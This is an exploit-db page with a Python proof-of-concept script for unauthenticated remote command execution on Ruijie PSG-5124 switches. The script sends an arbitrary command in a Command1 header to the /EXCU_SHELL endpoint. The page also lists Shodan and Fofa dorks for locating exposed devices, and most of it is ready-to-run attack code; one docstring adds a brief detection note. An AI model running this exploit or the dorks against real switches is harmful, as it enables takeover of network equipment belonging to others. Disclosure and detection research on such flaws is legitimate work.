Ruijie Switch PSG-5124 26293 – Remote Code Execution (RCE)

  • 作者: ByteHunter
    日期: 2024-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51888/
  • #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
    #- Shodan Dork: http.html_hash:-1402735717
    #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
    #- Exploit Author: ByteHunter
    #- Email: 0xByteHunter@proton.me
    #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
    #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
    
    import http.client
    import argparse
    
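    def send_request(ip, port, command):
        """Send the PoC's single GET to ``/EXCU_SHELL`` and print the reply.

        The request carries no credentials or session cookie. The value of
        ``command`` is placed verbatim in the ``Command1`` request header,
        next to ``Cmdnum: 1`` and ``Confirm1: n``. According to the advisory
        title on this page, the affected firmware executes that value.

        Detection note: a request for ``/EXCU_SHELL`` that carries
        ``Cmdnum`` / ``Command1`` headers is the observable this PoC leaves
        in proxy or web-server logs. Whether the device itself logs it is not
        shown on this page.

        Args:
            ip: Host name or address of the device's web interface.
            port: TCP port of the web interface, as text or int. It is only
                interpolated into ``"{ip}:{port}"``.
            command: String sent as the ``Command1`` header value.

        Returns:
            None. The status code and body are printed. Any failure is
            printed as ``Request failed: ...`` instead of being raised.
        """
        headers = {
            "Host": f"{ip}:{port}",
            # Browser-like headers copied from the original PoC request.
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate, br",
            "DNT": "1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            # Non-standard headers read by the /EXCU_SHELL endpoint.
            "Cmdnum": "1",
            "Confirm1": "n",
            "Content-Length": "0",
            "Command1": command
        }

        # Bound before the try so the finally clause can tell whether a
        # connection object was ever created (the constructor raises on a
        # malformed port).
        connection = None
        try:
            connection = http.client.HTTPConnection(f"{ip}:{port}")
            connection.request("GET", "/EXCU_SHELL", headers=headers)
            response = connection.getresponse()

            print(f"Status Code: {response.status}")
            # errors='replace' keeps a body that is not valid UTF-8 from being
            # reported as a failed request after the status line was printed.
            print(response.read().decode('utf-8', errors='replace'))
        except Exception as e:
            print(f"Request failed: {e}")
        finally:
            # The original closed the socket only on the success path.
            if connection is not None:
                connection.close()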
    
    if __name__ == "__main__":
        # Command-line entry point: three mandatory options, passed unchanged
        # to send_request(). No validation is applied to any of them, and
        # --port stays a string.
        parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
        for flag, help_text in (
            ('--ip', 'Target IP address'),
            ('--port', 'Port'),
            ('--cmd', 'Command'),
        ):
            parser.add_argument(flag, help=help_text, required=True)
        args = parser.parse_args()

        ip, port, command = args.ip, args.port, args.cmd
        send_request(ip, port, command)